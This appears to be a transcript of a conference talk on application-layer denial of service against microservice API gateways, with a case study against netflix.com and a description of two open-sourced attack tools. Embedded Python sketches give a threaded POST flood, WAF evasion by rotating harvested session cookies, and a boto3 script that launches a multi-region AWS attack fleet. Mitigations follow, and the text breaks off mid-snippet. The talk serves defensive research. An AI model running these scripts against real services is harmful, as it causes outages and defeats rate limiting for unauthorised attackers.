>>We're gonna start with a number: $1.71. That's what it cost Jeremy and me to run a five-minute test against netflix.com, in production, against one of our evacuated regions or data centers, and cause a five-minute service outage. We're gonna go back a little bit in time and start with this medieval picture here. You can imagine laying siege with a battering ram while you're attacking a castle, and there are archers sitting on top of the castle shooting arrows down, picking people off. You can think of that as your firewall, right? And we're doing our denial of service, aka we're trying to brute-force our way in. So we're losing a lot of life; we're doing work, but we're actually getting hurt. This is an image of Genghis Khan besieging a castle. Up here are bodies infected with the bubonic plague. He's catapulting them over the city walls, or the castle walls, and that contagion spreads to its inhabitants. So for a lot less work, and a lot less death on his side, he's able to cause a sort of amplification, right? The inhabitants die, and it's much more effective. And that's really the ethos of the talk today. We're gonna present why application denial of service attacks matter and why they're extremely relevant in microservice architectures. We'll start off by explaining what application DDoS is. We'll step into an introduction to microservices. Who here is familiar with microservice architectures? That's awesome, great, so we'll go through that quickly. We'll talk about application DDoS in microservices. I'll walk you through a framework we've developed to help you identify application DDoS in your own environments. We'll also do a case study where we look at what we did against netflix.com, and we'll introduce you to the two tools we're open sourcing today: Repulsive Grizzly, which is our application DDoS framework, and Cloudy Kraken, which is our AWS red team orchestration framework. We'll then do a demo, and we'll discuss mitigation strategies, a call to action, and some future work ideas we have.

So application denial of service is just denial of service focused on the application layer logic. You've probably attended talks that focus on the network layer; you've probably heard terms like amplification attacks, et cetera. We decided to focus on the application layer because we've found that in certain circumstances you can cause applications to become very unstable with far fewer requests. When we were doing our research we identified that application DDoS isn't that novel, and we pulled this from Akamai's State of the Internet security report. If you look in the upper left-hand corner here, it accounts for roughly 0.6 percent of all DDoS, so it's not very common. And if we look at what kind of application DDoS: most of the application-layer attacks Akamai saw were GET requests, so just somebody hitting a URL, and only ten percent of all application DDoS were POSTs, where I'm sending a request body to the web server, which takes potentially a little more sophistication. So although it's not very common, it has happened, which means attackers are privy to it: they know this is an exploitation vector and they're using it in certain circumstances. So, a quick introduction to microservices.
Microservices are basically a collection of small, loosely coupled but collaborative services. Think of them as really lightweight services that boot quickly, solve simple problems, and are often pretty small blobs of code, sometimes single-purpose, sometimes serving just a few purposes. The idea is that instead of having a giant monolith, a huge Java application, you'd have an environment where what used to be your giant Java application is now fifty or sixty different services connected together. And it provides some really unique benefits for companies that have really large environments and large customer demand.

So who uses microservices? I work for Netflix, so we do. Anybody here work for a company that uses microservices? Awesome. So here are some companies that use them, and within microservice architectures there are a couple of different approaches. We're gonna focus today on what's known as the API gateway architecture. You might work for a company or be familiar with microservice architectures that are more grid-based or mesh-based; those are outside the scope of today's discussion.

So, a quick primer. I mentioned we'll be focusing on an API gateway infrastructure, and you can see it in the image here. Basically, an API gateway is your single entry point. It's the system that sits on the edge, that's internet accessible, and it provides an interface to your middle tier and backend services. Think of it as a place where you can invoke calls that then federate out through your middle tier and backend services. Those middle tier and backend services might provide libraries for the API gateway; maybe those libraries let the gateway make REST calls, maybe it's gRPC or some other RPC framework. The specific examples we'll discuss today are REST-based.

Another concept I want to touch on is circuit breakers. In the circuit breaker diagram you can think of the gateway as, once again, a sort of centralized API service, the supplier as a middle tier service, and the client as your web browser, right? At some point in time there's a connection problem, the API gateway starts getting timeouts, and after a certain number of timeouts it fails fast. It trips the circuit and says: I'm no longer going to try to make requests to the middle tier service; I'm just going to return a generic error, or maybe some sort of fallback experience, something so the person using my site still gets some value. The idea is that it gives your middle tier services time to recover. A couple of things you have to take into consideration are: how do you know what timeout to choose, and how long should the breaker stay tripped?

Caching is another important concept that's often leveraged in microservice architectures, and the focus there is really just to speed up response time. The idea is that if we know what a user or a particular use case needs, we cache that data up front and return it very fast. That reduces the load on the services fronted by the cache, so you ultimately, potentially, need fewer servers in your middle tier and backend.
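To make the circuit breaker idea a bit more concrete, here's a minimal sketch in Python. It's not Hystrix or any particular library's implementation, just the pattern as described: count timeouts against a supplier call, trip open after a threshold, serve a fallback while open, and probe the supplier again after a recovery window. The threshold and recovery-window values, and the supplier/fallback callables, are illustrative.

    import time

    class CircuitBreaker:
        """Fail fast after repeated timeouts so the downstream service can recover."""

        def __init__(self, max_failures=5, reset_after=30.0):
            self.max_failures = max_failures   # consecutive timeouts before tripping
            self.reset_after = reset_after     # seconds to stay open before retrying
            self.failures = 0
            self.opened_at = None

        def call(self, supplier, fallback):
            # While the breaker is open, skip the supplier entirely and return
            # the fallback so the middle tier gets time to recover.
            if self.opened_at is not None:
                if time.time() - self.opened_at < self.reset_after:
                    return fallback()
                self.opened_at = None          # recovery window over: try again
                self.failures = 0
            try:
                result = supplier()            # e.g. a REST/RPC call with its own timeout
                self.failures = 0
                return result
            except TimeoutError:
                self.failures += 1
                if self.failures >= self.max_failures:
                    self.opened_at = time.time()   # trip the breaker
                return fallback()

The two tuning questions from the talk map directly onto this sketch: the timeout lives inside the supplier call, and how long the breaker stays tripped is the reset_after window.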
Okay, now that we've got the introductions out of the way, I want to talk about some common application DDoS techniques. Application DDoS is not new or novel; we've found references to it from, what, fifteen or twenty years ago, and a lot of the focus has traditionally been on regular I/O: things like CPU, memory, cache, disk, network, SQL, et cetera. But now that our application environments are becoming a little more sophisticated, there are actually more interesting attack vectors we should be exploring. Things like queuing and batching: how do middle tier and backend services queue and process requests? What are the library timeouts? As we mentioned before, circuit breakers are potentially going to trip if certain timeouts are hit, so can we take advantage of an application that doesn't tune its timeouts correctly? What about health checks? Obviously the services need to let each other know when they're healthy. What if we could focus our attacks specifically on the health check? Even if the service itself was fine, if we can cause the health check to fail, we might be able to cause some service instability. And then there are services that don't autoscale. You can imagine a giant Java monolith or a backend database. When we say autoscale, think of it as the concept of: my service has got a lot of work, so I'm going to boot more of it. A giant database might not be able to boot a lot of copies of itself very quickly, so that might be another area you want to focus your attack on.

And really, the point I want to drive home is that there's a difference here between monolithic denial of service and microservice denial of service. I would say most monolithic application DDoS is one-to-one, meaning you're sending some work to the service and it's happening on that box, right? It's doing some calculation, so it's roughly a one-to-one work-per-request ratio. I say "most" because there are monolithic applications where you might actually get a little bit of amplification going, but in general it's going to be on a single system. In microservice application DDoS it's often one-to-many, because we might make a request at that gateway that federates out to tons of middle tier and backend services, and if we construct those requests correctly we might be able to cause a lot of work. Each one of those services in the middle tier and the backend has different characteristics: different health checks, different timeouts, potentially different system builds and configurations. There are a lot of things we might be able to cause havoc on if the system can't handle the requests we're sending through.

So here's a new-school microservice API DDoS example. Here's little Jimmy, right, our '90s kid. Here's Jeremy, he's typing with gloves on, right, that's how we all hack. The idea is, here we have an edge; you can think of the edge as the things you'd be able to hit in your browser. So we have our proxies, our website, maybe some static assets, another proxy. And we have our API gateway here, which, once again, provides an interface to the middle tier and backend services.
So we fire up our script. It's a Python script, let's assume it's, I don't know, two hundred threads or something. We're POSTing to /recommendations, and there's a JSON blob that says range zero to ten thousand. Okay. So that call flows in, and the API gateway starts making many client requests; let's assume it starts pegging those middle tier services for those ten thousand recommendations. The middle tier services start making many calls to the backend services, maybe to retrieve data. The backend service queues start filling up with expensive requests. And now we've reached that sweet spot, right? The client timeouts start happening, circuit breakers might trip, and maybe some of the data comes back, maybe not all of it. Maybe a fallback experience is triggered, and once again, a fallback experience you can think of as: hey, I don't know what to do, so I'm going to give you some data to work with, so your customers can still sort of browse the site.

Cool. So let's get a little bit more into that. Another example, same sort of attack: we have a single request asking for a thousand objects that are not in cache. I mention that the objects not being in cache is extremely important, because cache is fast, it's hella fast. If we're trying to exploit an application DDoS vulnerability and we're only targeting things that are in cache, we're not going to be successful. So we have to perform a cache-miss attack. Now, if you Google "cache miss" you're going to find stuff about Intel processors; this is much higher in the stack. Really all we're doing here is figuring out what's in the cache, and obviously if you're testing this in your own environment or for your own company you might have a good idea what's in the cache, and then making calls that require lookups outside the cache. Often if you specify really large requests, ranges, and object sizes, you can pull this off. So let's step back to the example. We have that single request asking for a thousand objects not in the cache. The middle tier library, whatever it is, doesn't support batching, so the gateway basically has to make an RPC call for every object we're asking for. Since we're asking for a thousand objects and two middle tier services have to be called for this specific request, that results in two thousand RPC calls. Those middle tier services each need to call three backend services, so that's six thousand calls. You start seeing the trend here, right? There's an opportunity for a lot more requests to happen once we get past the API gateway.
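To make that fan-out concrete, here's a rough sketch of the kind of script the example describes: a bunch of threads POSTing one expensive range request over and over. The endpoint, host, and payload shape are hypothetical stand-ins, not the actual API that was tested.

    import concurrent.futures
    import requests

    # Hypothetical endpoint and payload shape, for illustration only.
    URL = "https://api.example.com/recommendations"
    PAYLOAD = {"range": {"from": 0, "to": 10000}}   # far more objects than a normal client asks for

    def one_request():
        # A single cheap POST at the edge that the gateway fans out into
        # thousands of RPCs against middle tier and backend services.
        try:
            r = requests.post(URL, json=PAYLOAD, timeout=60)
            return r.status_code, r.elapsed.total_seconds()
        except requests.RequestException as exc:
            return type(exc).__name__, 0.0

    def run(threads=200, total_requests=10000):
        with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as pool:
            futures = [pool.submit(one_request) for _ in range(total_requests)]
            for f in concurrent.futures.as_completed(futures):
                status, elapsed = f.result()
                print(f"{status} in {elapsed:.1f}s")   # watch 200s slow down, then turn into 5xx

    if __name__ == "__main__":
        run()

The point of the sketch is the asymmetry: each POST costs the attacker almost nothing, while the gateway turns it into thousands of cache-missing RPC calls downstream.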
So what's the workflow for identifying application DDoS? The first thing you need to do is identify the most latent service calls: which calls are the most expensive, which touch the most middle tier and backend services? Once you've identified those, you want to investigate ways to manipulate them. How do we make them more expensive? How do we get those calls to touch more services? Once we've determined that, we want to learn more about the API gateway's error conditions: how do we know our attack is working? How do we know when we're being blocked by a firewall? What are the thresholds and timeouts of the particular clients we're targeting? And once you build that story up, you need to tune your payload to fly under the WAF, and we'll discuss a couple of techniques you can use to do that. Then we test our hypothesis at a small scale, and then we scale the test up using the orchestration framework and our Repulsive Grizzly attack framework, which we're open sourcing today. [single person clapping] Thank you. Heh, cool. [Laughing]

So first we've got to find latent service calls. Now, I'll admit this approach is error-prone, but it's a good first step if you're just getting started with this process. Open up the Developer Console in Chrome, click the Preserve Log button, and just start browsing the site. After some period of time, sort by time, and then look at those requests, especially the POST requests to your API gateway. I'll mention why this is a little error-prone: as you can imagine, just because a call doesn't show up as latent doesn't mean it couldn't be made latent, so you might miss some opportunities here. Actually, I think a better approach would be to automate this: you could imagine a spidering tool that crawls your application, doing a fair bit of sampling to figure out which calls are the most latent. So I think there's some room to improve on ways to identify those calls automatically.

Oops, sorry, it froze. Sorry about that. Can you hold this for a second? The laptop literally froze. Sorry about that, guys. Give me just a second here. We have a backup. Yeah, I'm fully bricked. We good? >>Shoulda got real jobs! [nervous laughter] >>Cool, we're good, we've got a backup. Thanks, guys. Hunter2. [Laughter]

Cool. Alright. So let's assume we've identified an interesting latent service call. I've found this call, and I'm not sure yet whether it's interesting. It might be a little hard to see in the back, so I'll walk through it. Here we have a POST request to some licensing endpoint. It has a bunch of encrypted data; I Base64-decoded it and started messing with it, and it just returned a fast error code. So there wasn't really anything for me to tweak: even though the call was latent, changing the input didn't result in increased latency. That's an example of a call that's probably not a good attack vector. Here's another call that might be a little more interesting: once again, a POST to that recommendations endpoint we've been using as our example. You'll notice in the JSON body there's an array of items, and I observed that when I added more items to that list, it resulted in a longer response time. If I added too many items to the list, I got a special error code. Okay, that's kind of cool. So changing the input resulted in increased latency of the API call.
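That probing step is easy to script. Here's a minimal sketch that varies the number of items in the request body and watches how latency responds; the endpoint and the "items" field are hypothetical placeholders for whatever POST you captured in the developer console.

    import requests

    # Hypothetical endpoint and body shape; substitute the call you captured in DevTools.
    URL = "https://api.example.com/recommendations"

    def probe(num_items, samples=3):
        """Return (status, rough median latency) for a request carrying num_items IDs."""
        body = {"items": [{"id": i} for i in range(num_items)]}
        times = []
        for _ in range(samples):
            r = requests.post(URL, json=body, timeout=30)
            times.append(r.elapsed.total_seconds())
        times.sort()
        return r.status_code, times[len(times) // 2]

    for n in (1, 10, 100, 1000):
        status, latency = probe(n)
        # Latency that grows with input size is the interesting signal; so is a
        # special error code (like a 413) once n gets large enough.
        print(f"{n:>5} items -> {status} in {latency:.2f}s")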
A more accurate way to find latent service calls is to actually have visibility into what your middle tier and backend services are doing, and this is a dashboard we have at Netflix that helps us identify that. I'm zooming in on three areas that I think are interesting. The first is requests per second: how many times is this particular service being invoked? The next is cache response: does this service actually cache content? And the most interesting bit here is latency. It's showing a rollup of latency across the 90th percentile of requests, and we see we have one call here that averages two seconds. That's interesting.

So a technique I might use here is: I know these services can be invoked via the API gateway. Maybe I didn't find them with the original discovery method I discussed, but I can probably step my way back, go to the documentation for the API gateway, and figure out how to invoke those latent service calls. If you're in a position where you can actually see this kind of data, you're going to have a much higher chance of finding those latent calls.

So once we've identified the latent calls, let's discuss some attack patterns we can leverage to make them more expensive. The first is range. We'll also discuss objects out per object in, manipulating request size, and then combinations. There are other vectors, but these are the three we've found to be the most effective. So, the first technique is range. You'll see here that we have a request for items, once again recommendations, and we have a "from" and a "to". If we go from one to two, what if we change it to one to two hundred, to twenty thousand, to two million? You're probably thinking to yourself, huh, this feels a lot like what a scraper might do. Oop, did it just start doing that? Oh, there we go. Cool. It's glitching a little bit, that's too bad. Sorry about that, hopefully it doesn't give you a headache back there, guys. So what we basically observed was that we can increase the range, and this technique is really similar to what content scrapers use. That is obnoxious, man. [Laughing] We'll keep going, and we'll skip over that note. Cool. Alright, on to the next one: objects out per object in. Here we've identified a direct object reference, right, we have an ID here, so what if we send more of those in? Yeah, can you just see if you can get that working? Thanks. Just reboot it. Cool. Okay, the idea being that if we enumerate more objects, if we send more objects in, maybe we'll see an increase in response size, or, sorry, an increase in response time. Yeah, dude, thank you. Cool. Request size is another technique we can take advantage of. As you can see in the corner here, we have this element called art size, with a value of 342 by 192. Imagine tacking a zero onto the end of that: if the art size is calculated in real time, you can imagine that might result in increased latency. So once again, that's another knob we can potentially toggle, and you've probably noticed that a lot of this feels similar to what a content scraper might do. When you're trying to pull a catalog off of some site, you're manipulating the range of your requests; that's ultimately what a lot of these techniques are, the same stuff a content scraper uses. Or you can use a combination, right? We just turn all the knobs we possibly can. What about languages? You probably noticed English and Spanish; what if we add French, Cantonese? Or what about these object fields it's obviously looking for: description, title, artwork. Maybe if we put more object fields in there, we'd touch more microservices.

The next thing you want to do is build a list of indicators of API health. As I mentioned before, with the API gateway, you kind of want to know whether your attack is succeeding. So the first indicator is: what's a healthy response? Probably an HTTP 200, right?
When does your API gateway time out? What that basically means is: your API gateway is under so much distress that it literally cannot function anymore. Specifically, in our test example we got a 502 Bad Gateway. In your environment you might get a 500, maybe a stack trace, maybe something on the server, but there should be some indicator that your API gateway is not healthy. Next: what about those middle tier services, what if they're not healthy? We might see something like a 503 Service Unavailable, or something that lets us know one of the circuit breakers has actually been tripped. What about a WAF? If we've sent too much work, too many requests, and we're getting blocked, we might get a 403 Forbidden. Or the rate limiter: if you're in an environment that actually has a rate limiter, and know that that's not very common, you might see something like a 429. And then framework exceptions. These are kind of interesting and sort of unique and novel: you might end up in a position where the application wanted to do some work but literally gave up and said, you're asking me for too much work. And then there are other indicators. If we zoom in here, we got an HTTP 200, okay, but look at the latency: that's like sixteen seconds, and that's a huge response. HTTP 200 plus latency is kind of the holy grail; it means you're causing a lot of work on the backend. Another thing you might see is an empty response: you send something, it takes sixteen seconds to return, and you get nothing back. You'll start getting these weird error conditions when you send enough traffic at these services. And obviously look for correlations: while you're running your tests, be browsing your site. Are there other systems being impacted that you didn't even take into consideration?
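One way to use those indicators during a test is to classify every response as it comes back. Here's a small sketch of that mapping; the specific codes and thresholds will differ per environment, and they're taken straight from the examples above rather than from any particular tool.

    def classify(status, latency_seconds, body):
        """Rough read on what a single response says about the target's health."""
        if status == 200 and latency_seconds > 10:
            return "holy grail: healthy status code but very expensive backend work"
        if status == 200 and not body:
            return "odd: empty response, services may be shedding work"
        if status in (502, 504):
            return "gateway itself is struggling (bad gateway / gateway timeout)"
        if status == 503:
            return "middle tier unhealthy, or a circuit breaker has tripped"
        if status == 403:
            return "WAF is blocking us: back off, rotate sessions or IPs"
        if status == 429:
            return "rate limiter kicked in"
        if status == 413:
            return "framework gave up: request entity too large"
        return "unclassified: correlate with other signals"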
So once we've built up that latent request, we need to find the sweet spot, and that's really about finding the right balance between the number of requests and the logical work per request, because as we mentioned, we have a lot of knobs we can tweak to make more work happen per request. There's going to be some spot where the service stays healthy, and a spot where the service is impacted, when there are enough requests and enough logical work per request. If we send too many requests too fast, or too much work per request too fast, we're going to get rate limited; once again, think of rate limiting as the firewall kicking in and blocking us. If we don't send a lot of requests but the logical work per request is high, the service might scale up, right? It might boot more of itself and stay healthy. So really our job is to find the skull and crossbones: we want to be in the sweet spot, just under where we'd get blocked by the firewall, and just enough to cause the service to be disrupted.

A quick case study here. It all started with this HTTP status 413. Has anybody ever seen this status code before? It was kind of new for me. The description is: the request entity is larger than the server is willing or able to process. Like, ding, that sounds really cool, right? It literally gave up. So what we tried to do was figure out how to get rid of the 413. We actually wanted a better status code; we wanted the server to do the work, not quit right out of the gate. So I had to make the call more expensive. Once again I was tweaking the knobs we discussed in the framework section of the talk, and I got to a spot where I was able to get a relatively large response size, and it was pretty darn latent.

The next thing we wanted to do was test it on a smaller scale, and to do that we used Repulsive Grizzly. Repulsive Grizzly is a skunkworks application DDoS framework that we're open sourcing today. I say skunkworks because it's kind of as-is; it's definitely not as documented or feature-rich as some of the other projects I've open sourced, but the hope is that the community will build on it. You might have used other denial of service tools in the past; the reason we wrote Repulsive Grizzly is that we wanted a couple of special functions that would help us exploit application DDoS in microservices, and we'll walk through a couple of those. It uses Eventlet for high concurrency, so it's super fast, and it leverages AWS SNS for logging. You can think of SNS as a messaging service, so when we run these attacks and scale them up, we have a place to write log messages and track the health of our attack agents while we're running a test. It's pretty easy to configure, too. See, here's a mountain of cookies, aka sessions. Delicious, right? What we're trying to do here is bypass the WAF, and one of the techniques Repulsive Grizzly leverages is the ability to round-robin authentication objects. You might sign up to the site, or maybe you've generated a bunch of session cookies for a particular application; you can use Repulsive Grizzly to iterate through those, round-robin them, and fly under the WAF if needed.

So here's a single node test, and it might be a little hard to read in the back, so I'll walk you through what's going on. We fired up this specific attack and we're looking at the status codes over here. We've got some 200s and, oops, 504s, and a ton of 503s, and as it goes on, more 503s, more 504s, and I start getting pretty excited, because I realize at this point I've caused quite a bit of unhealthiness. There were some 200s coming through, but it wasn't very common. So I'm sitting there running the test, and we have a few browsers open; I'm refreshing the page and in general I'm just getting site errors. Every once in a while the site would come back, but in general it wasn't working very well.
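Here's a minimal sketch of that cookie round-robin idea, using Eventlet for concurrency the way the talk describes. It is not Repulsive Grizzly's actual code or config format; the endpoint, payload, and cookie values are placeholders.

    import itertools
    import eventlet
    eventlet.monkey_patch()   # make sockets cooperative so green threads overlap I/O
    import requests

    # Placeholders -- not the real target or Repulsive Grizzly's config format.
    URL = "https://api.example.com/recommendations"
    PAYLOAD = {"range": {"from": 0, "to": 10000}}

    # Round-robin a pool of pre-collected session cookies so no single session
    # crosses the WAF's per-session thresholds.
    SESSIONS = itertools.cycle([
        {"SESSION": "cookie-value-1"},
        {"SESSION": "cookie-value-2"},
        {"SESSION": "cookie-value-3"},
    ])

    def fire(_):
        try:
            r = requests.post(URL, json=PAYLOAD, cookies=next(SESSIONS), timeout=60)
            return r.status_code
        except requests.RequestException as exc:
            return type(exc).__name__

    pool = eventlet.GreenPool(size=200)        # high concurrency, one green thread per request
    for status in pool.imap(fire, range(5000)):
        print(status)                          # watch 200s give way to 503s and 504s

Per the talk, the real tool publishes this kind of per-request status to SNS rather than printing it, which is what feeds the central tracker dashboard shown later.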
So the next step, we decided, was to develop Cloudy Kraken, which is an orchestration framework. Jeremy's the author of that, and he'll walk you through how he approached it.

>>So Scott came up with an awesome new attack against the application, but something like Netflix is a global service. There are lots and lots of WAFs, there are denial of service prevention mechanisms, so while he can run those attacks from one laptop, that's really not going to cut it if we want to try and attack the whole infrastructure. So what do we do? We automate it. So now we're going to have a whole bunch of Cloudy Krakens running, and a lot of Repulsive Grizzlys. So what is it? It's a red team orchestration framework, written in Python, that runs on AWS. Some of the key features: you get a fresh global fleet of instances every time you run the test, and that really helps for getting fresh IP addresses, fresh parts of the world, fresh CIDR blocks, to get around what you might normally see with a WAF or DDoS protection. You get lots of good global IPs, because a common thing you can do for DDoS protection is velocity-based checking: you watch how many hits come from one IP address and block based on that. Another key point is that as you're iterating, trying out different kinds of attacks and configs, it has all the code push and configuration automation built in. So when you have a new attack you want to try out, you just run the script again; it rebuilds the global fleet and restarts your attack. Since it is a global attack, you want to make sure the timing is right, so it can be effective and so it can be reproduced, because over time, you know, it's a great attack tool, but what you really want is for it to be a regression test, so you can say: every time, I'm going to run it for exactly five minutes, at this time of day, right after this new push of code to the backend, and check how your infrastructure handles it. So getting all these instances around the world to start at exactly the same time and stop at exactly the same time is a key component. And lastly, we are attacking, in some cases, production environments, so if we make a mistake and attack the wrong one, it's good to have an immediate kill switch to shut it all back down.

So, how many people have worked with AWS? That's a lot of people. Generally, here's the overview of how it works. In AWS they have different regions around the world, which are basically data centers around the world, so we can push the instances out to different regions. We have a single S3 bucket and a single DynamoDB table that hold the configuration and the code that's actually going to run against the servers in the test. And then, like we said before, we have SNS, a pub/sub messaging system, so the agents can send back all their status to a dashboard on the backend. This is the general workflow of how Cloudy Kraken works: you put your attack code in a GitHub repo, and it updates the code, pushes it out to S3, pushes it out to DynamoDB, and resets everything to get ready to go. Next it builds out the whole environment, so again you get a fresh set of instances. We definitely like to use instances and not Docker, and the big reason is that we can use the enhanced networking you get on the big EC2 instance types. It creates all the networking, the subnets and everything, gets all the IP addresses set up, and then launches the instances. Then, using cloud-init, it configures the machines: each machine downloads the code, configures itself, and then waits to start the attack when the time hits. As the attack is running, it sends all the data through SNS, and a big part is that at the end, when we're done with testing, we want to make sure we get back all the log data from the systems so we can go back and analyze the exact results and output we got.
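To give a feel for that workflow, here's a heavily simplified sketch of the same pattern with boto3. This is not Cloudy Kraken's actual code: the bucket name, AMI IDs, instance type, config fields, and the user-data script are all placeholders, and a real run would also build VPCs, subnets, and IAM roles that are skipped here.

    import json
    import time
    import boto3

    # Placeholders only.
    REGIONS = ["us-west-2", "us-east-1", "eu-west-1", "ap-southeast-1"]
    BUCKET = "example-redteam-config"
    AMIS = {region: "ami-00000000000000000" for region in REGIONS}   # per-region agent image
    AGENTS_PER_REGION = 10

    def push_config(start_in_seconds=300):
        """Upload one shared attack config, including a synchronized start time."""
        config = {
            "attack": "attack_1",
            "threads": 250,
            "duration_seconds": 300,
            "start_at": int(time.time()) + start_in_seconds,  # every agent waits for this
        }
        boto3.client("s3").put_object(
            Bucket=BUCKET, Key="attack_config.json", Body=json.dumps(config))

    def launch_fleet():
        """Boot fresh agents in every region; fresh instances mean fresh IPs."""
        user_data = ("#!/bin/bash\n"
                     f"aws s3 cp s3://{BUCKET}/attack_config.json /opt/attack_config.json\n"
                     "# ...pull down the attack code, then sleep until start_at...\n")
        fleet = {}
        for region in REGIONS:
            ec2 = boto3.client("ec2", region_name=region)
            resp = ec2.run_instances(
                ImageId=AMIS[region], InstanceType="c4.xlarge",
                MinCount=AGENTS_PER_REGION, MaxCount=AGENTS_PER_REGION,
                UserData=user_data)
            fleet[region] = [i["InstanceId"] for i in resp["Instances"]]
        return fleet

    def kill_switch(fleet):
        """Tear the whole fleet down immediately if the wrong target is being hit."""
        for region, instance_ids in fleet.items():
            boto3.client("ec2", region_name=region).terminate_instances(
                InstanceIds=instance_ids)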
So now that we have the system built, we went ahead and ran the test. We tested it against the production environment of a service, and we did it using a multi-region, multi-agent setup: in this case we were running in four different regions, ten instances per region, so about forty instances overall, globally, and each one had, I think it was, 250 threads running. We conducted two different five-minute attacks, and then we had a chance to monitor their success and see how well they worked. From the simple view of our status dashboard you'll see, at the bottom, all the nodes checking in saying, hey, I'm online, and then you'll see all the requests going through and what kind of status codes we get. You can immediately see at the top, which is kind of hard to see, but those are all 503s and 504s. So a majority of the calls coming back as the test runs are failures of one type or another.

Here are the results of the test. We had an 80 percent failure rate, and on any sort of large UI or large service like Netflix or Hulu or anything else, you're going to have problems if 50 percent of your calls are failing: most of your UI will fail, or you'll have parts of your UI that rely on other parts, so once you get past a certain percentage you have no user experience and you're effectively offline. During the attack you can see the first run went great and we got really good results. The second test, we wrote some new code, pushed it out really quickly, and tried again. It wasn't as effective, but this is why we like having that immediate ability to push out new code and retest, and to have a high velocity of deployments, just like other services and microservices do with A/B testing and pushing out new stuff; we're trying to replicate that in a more dev-style environment. Overall, while this was running, we had less than one percent of the traffic being blocked. So effectively, between all the cookies, all the different parts of the world, and all the IP addresses we were using, we were able to get our attack through. And again, at the time we ran the test, it would have cost about a dollar and seventy-one cents to run the whole test and take out the production service we were attacking. These days it could probably be a bit cheaper with spot instances, and depending on the services you're using with AWS, you can actually fit it all into the free tier, so you could probably do it for free. [laughing] [clapping] Thank you.

>>So what failed? We had a couple of things that I thought were pretty interesting and worth discussing. We identified expensive API calls that we could invoke with non-member cookies, and I'll explain what that is. I'm sure you've browsed a site and gotten a JSESSIONID before you log in, or a PHP session ID, some sort of session identifier. We observed that we could take those and issue them against the API in certain circumstances and actually cause latent calls. So one of the first things I did was write a quick script, and we dumped something like five thousand cookies and used those in a round-robin fashion. That was kind of an interesting finding.
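A minimal sketch of what harvesting those non-member sessions can look like, assuming a site that hands out a session cookie on the very first unauthenticated page load; the URL and the scale here are placeholders, not what was actually run.

    import requests

    # Hypothetical: many sites set a session identifier (JSESSIONID, PHPSESSID, etc.)
    # on the first unauthenticated page view.
    SITE = "https://www.example.com/"

    def harvest(count):
        """Collect pre-login session cookies to round-robin through later."""
        jars = []
        for _ in range(count):
            r = requests.get(SITE, timeout=10)      # fresh request, fresh session cookie
            if r.cookies:
                jars.append(r.cookies.get_dict())
        return jars

    cookies = harvest(count=50)    # small sample; the talk mentions roughly five thousand
    print(f"collected {len(cookies)} unauthenticated sessions")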
The expensive traffic resulted in many RPCs: one call to the API gateway averaged out to about 7,200 RPC calls between middle tier and backend services. And the WAF wasn't able to monitor those middle tier RPCs; it just wasn't configured to look at them. It was watching the gateway, but not those middle tier and backend calls.

So let's dive in a little on how this worked exactly, and then we'll show a demonstration. First, we have our attack agents cycling through multiple session cookies and IP addresses to bypass the WAF. Each request we make asks for 7,200 expensive calculations from multiple backends. The objects weren't in the cache, so we were getting cache misses, and each cache miss meant a call to the service to look that information up. It took about fifteen seconds and returned this huge object, and the queue kept taking longer and longer: that fifteen seconds started to become eighteen seconds, nineteen seconds, and as the queue continued to fill up, the service got more and more unhealthy. The middle tier services, sometimes they returned 200s, they actually did return, but often they were returning some 5xx status code: 503, 504, sometimes just plain 500s. Sometimes they would return a 200 but the body was actually an exception, which was kind of interesting. And the API gateway had to respond to all of this, so it starts tripping breakers, the WAF's kicking in, sometimes we're getting 403s, sometimes 503s, 200s, 504s. Ultimately all these RPC calls were really slamming the gateway, so it knew it needed to scale up, but it couldn't boot itself fast enough during the attack; the CPU on the API gateway just got smashed, and we started getting gateway timeouts. We reached a point where the gateway itself could no longer facilitate requests.

And, demo. Alt-tab. Okay, so at this point we've already provisioned our attack environment and we're going to run a Kraken attack here. The first thing we do is configure the attack: the number of threads, the instances, what region or data center we want to run it from, or regions, plural. For this specific example we'll run it from us-west-2. We're going to run attack one, twenty threads per attack agent, seven agents, and we'll run the test for 240 seconds. Cool. Alright, so here's our staging environment; this is where we did our testing, and you'll see the site's online. We'll go back and pop open the Amazon console to see how our agents are doing. We'll hit the refresh button and notice the agents are in a pending state, so they're starting to boot up. And right here you see the Grizzly tracker I mentioned before; it's listening to that central queue and telling us what's going on with the status codes and the health of everything. Once those agents come online and are running, we'll grab an IP address and SSH on, and I'll show you what's going on on those agents. It's just booting up at this point: it's installing all the packages it needs, pulling down the Repulsive Grizzly attack framework, and installing all of its dependencies.
And then it waits to start the test. Alright, so the agents are phoning home and they're starting the attack. We see the green coming in, and now the status codes start flowing; I'll pause it here. We see some 503s, twenty-six hundred of them, so we know we've caused quite a bit of havoc. We'll let it keep going; more 503s are coming in. We'll pop back up to the site and refresh. Is it healthy? Yes, okay, alright, let's keep going, keep going... boom. We got a 504 origin read timeout. That's pretty good, right?

So how do you defend against this and mitigate it? I think the first and most important step is to understand which microservices impact your customers' experience: you need to know whether you have specific services that, if they become unstable, result in a cascading system failure. Once you have a good understanding of what those are, you need to put the proper protections in place. A good, reasonable mitigation is simply to limit the batch and object size, right? I shouldn't be able to make a request to your service that's absolutely obnoxious and abnormal: if you're a service that usually returns ten objects and somebody's asking you for one million, you should have limits in place. Hard limits. And you should enforce those limits on both the client and the server (there's a small sketch of this after the rest of the mitigations). Your rate limiter, whenever possible, or your web application firewall, should monitor the middle tier signals, or the cost of the request. If we're only monitoring at the edge, at that gateway, we're missing the point: if I'm sending one request that actually results in 7,200 requests, we need to know that, so we should have visibility and insight into those middle tier services, so we can enforce the right blocks and protections well before we end up in a cascading-system-failure sort of world. The rate limiter should also monitor the volume of cache misses: if your service has data in a cache, and most of the time those objects come from the cache, and then you start seeing all these cache misses, it means one of two things: either your cache is misconfigured, or somebody's doing something nefarious. You'll want to prioritize authenticated traffic over unauthenticated. As I mentioned before, we had these basically unauthenticated sessions and we were able to use them to take down the service. Performing an authenticated denial of service attack is a lot more expensive: you actually have to get sessions, and although there are ways to do that, in general the attack is most likely going to be unauthenticated. You'll also want to configure reasonable library timeouts: if you set your timeouts too aggressively, we might be able to trip the circuit without a lot of work; if you set them too leniently, we might be able to make the services unhealthy before a circuit breaker ever trips. So you have to be conscientious about what your library timeouts are set to.
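Here's the batch and object size limit as a minimal sketch, using Flask purely as an example framework; the route, field names, and limits echo the hypothetical recommendations example from earlier rather than any real service.

    from flask import Flask, jsonify, request

    app = Flask(__name__)

    MAX_ITEMS = 100    # hard server-side caps, enforced regardless of what the client sends
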